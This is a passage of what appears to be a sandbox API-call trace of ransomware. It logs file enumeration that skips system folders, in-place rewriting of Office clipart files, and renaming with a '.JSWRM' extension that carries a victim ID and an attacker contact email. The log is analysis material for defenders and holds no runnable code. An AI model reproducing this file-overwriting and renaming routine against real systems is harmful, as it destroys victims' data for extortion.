dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16666) returned 1 [0092.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4110) returned 0x24d210 [0092.713] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4110, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4110, lpOverlapped=0x0) returned 1 [0092.716] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.716] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4110, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4110, lpOverlapped=0x0) returned 1 [0092.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.716] CloseHandle (hObject=0x314) returned 1 [0092.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0092.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0092.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0092.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0092.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0092.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0092.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.717] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00034_.WMF", cAlternateFileName="")) returned 1 [0092.717] lstrcmpiW (lpString1="PE00034_.WMF", lpString2=".") returned 1 [0092.717] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="..") returned 1 [0092.717] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="...") returned 1 [0092.717] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="windows") returned -1 [0092.717] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="recovery") returned -1 [0092.718] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="perflogs") returned -1 [0092.718] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="documents and settings") returned 1 [0092.718] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.718] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="system volume information") returned -1 [0092.718] lstrcmpiW (lpString1="PE00034_.WMF", lpString2="msocache") returned 1 [0092.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00034_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00034_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00034_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0092.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00034_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00034_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00034_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0092.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.718] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15708) returned 1 [0092.718] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d50) returned 0x24d210 [0092.719] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3d50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3d50, lpOverlapped=0x0) returned 1 [0092.724] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.724] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3d50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3d50, lpOverlapped=0x0) returned 1 [0092.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.725] CloseHandle (hObject=0x314) returned 1 [0092.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0092.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0092.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.726] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1003f0d3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1003f0d3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00049_.WMF", cAlternateFileName="")) returned 1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2=".") returned 1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="..") returned 1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="...") returned 1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="windows") returned -1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="recovery") returned -1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="perflogs") returned -1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="documents and settings") returned 1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="system volume information") returned -1 [0092.726] lstrcmpiW (lpString1="PE00049_.WMF", lpString2="msocache") returned 1 [0092.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00049_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00049_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00049_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00049_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00049_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00049_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.727] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16448) returned 1 [0092.727] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4040) returned 0x24d210 [0092.727] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4040, lpOverlapped=0x0) returned 1 [0092.739] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.739] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4040, lpOverlapped=0x0) returned 1 [0092.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.739] CloseHandle (hObject=0x314) returned 1 [0092.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0092.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0092.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.740] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.741] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d18, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00050_.WMF", cAlternateFileName="")) returned 1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2=".") returned 1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="..") returned 1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="...") returned 1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="windows") returned -1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="recovery") returned -1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="perflogs") returned -1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="documents and settings") returned 1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="system volume information") returned -1 [0092.741] lstrcmpiW (lpString1="PE00050_.WMF", lpString2="msocache") returned 1 [0092.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00050_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00050_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00050_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00050_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00050_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00050_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.742] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19736) returned 1 [0092.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4d10) returned 0x24d210 [0092.742] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4d10, lpOverlapped=0x0) returned 1 [0092.745] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.745] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, 